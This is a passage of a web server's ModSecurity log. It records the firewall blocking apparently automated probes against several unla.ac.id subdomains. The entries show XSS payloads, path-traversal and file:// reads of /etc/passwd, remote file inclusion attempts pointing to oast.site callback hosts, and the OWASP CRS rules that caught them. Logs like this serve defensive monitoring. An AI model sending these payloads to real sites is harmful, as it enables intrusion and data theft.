"ZO14lcCo-f0AAAjM7LgAAAAT"]
[Tue Aug 29 11:48:21.686608 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAjM7LoAAAAT"]
[Tue Aug 29 11:48:21.706620 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lcCo-f0AAAjM7LsAAAAT"]
[Tue Aug 29 11:48:21.714968 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAjtc@IAAAAX"]
[Tue Aug 29 11:48:21.721081 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lcCo-f0AAAjYrE0AAAAK"]
[Tue Aug 29 11:48:22.371369 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAkdu@AAAAAO"]
[Tue Aug 29 11:48:22.388677 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAkrz7QAAAAC"]
[Tue Aug 29 11:48:22.391509 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAjM7L0AAAAT"]
[Tue Aug 29 11:48:22.414564 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAkdu@IAAAAO"]
[Tue Aug 29 11:48:22.434480 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14lsCo-f0AAAjYrFEAAAAK"]
[Tue Aug 29 11:48:22.448312 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:calendar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:calendar: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/themes/diarise/download.php"] [unique_id "ZO14lsCo-f0AAAkleyMAAAAD"]
[Tue Aug 29 11:48:22.494396 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:key: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/custom-tables/iframe.php"] [unique_id "ZO14lsCo-f0AAAkrz7kAAAAC"]
[Tue Aug 29 11:48:23.351266 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_success: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14l8Co-f0AAAjYrFQAAAAK"]
[Tue Aug 29 11:48:23.455970 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAj12EUAAAAa"]
[Tue Aug 29 11:48:23.458541 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAjtc@0AAAAX"]
[Tue Aug 29 11:48:23.469371 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAkoTjIAAAAH"]
[Tue Aug 29 11:48:23.700813 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAj12EsAAAAa"]
[Tue Aug 29 11:48:23.892400 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gp51bowza3mysg.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gp51bowza3mysg.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14l8Co-f0AAAj12FMAAAAa"]
[Tue Aug 29 11:48:23.911930 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gswmri9xdkbj9b.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gswmri9xdkbj9b.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14l8Co-f0AAAj12FQAAAAa"]
[Tue Aug 29 11:48:23.957963 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14l8Co-f0AAAkrz78AAAAC"]
[Tue Aug 29 11:48:23.971665 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gb7377kh8fpr5w.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gb7377kh8fpr5w.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14l8Co-f0AAAkqHp0AAAAM"]
[Tue Aug 29 11:48:24.436041 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:loginname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:loginname: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login/forgetpswd.php"] [unique_id "ZO14mMCo-f0AAAj12FsAAAAa"]
[Tue Aug 29 11:48:24.440948 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gdx4ixmghq3ypy.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gdx4ixmghq3ypy.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14mMCo-f0AAAjtc-UAAAAX"]
[Tue Aug 29 11:48:24.472795 2023] [:error] [pid 2345] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g9pj7sq13444fq.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26g9pj7sq13444fq.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14mMCo-f0AAAkpFXsAAAAI"]
[Tue Aug 29 11:48:24.474889 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gbog3a75r1o78o.oast.site/file.txt found within TX:1: cjmnbitjmimt14dgn26gbog3a75r1o78o.oast.site/file.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO14mMCo-f0AAAj12F0AAAAa"]
[Tue Aug 29 11:48:24.533914 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:message_error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:message_error: <img src=c onerror=alert(8675309)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/main/blank"] [unique_id "ZO14mMCo-f0AAAj12GAAAAAa"]
[Tue Aug 29 11:48:27.863815 2023] [:error] [pid 2358] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAk2KWoAAAAb"]
[Tue Aug 29 11:48:27.863868 2023] [:error] [pid 2362] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAk6PBUAAAAh"]
[Tue Aug 29 11:48:27.910626 2023] [:error] [pid 2359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAk3854AAAAe"]
[Tue Aug 29 11:48:27.915819 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./ found within ARGS:f1: .//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./\\x5c.//./etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14m8Co-f0AAAkwQRcAAAAS"]
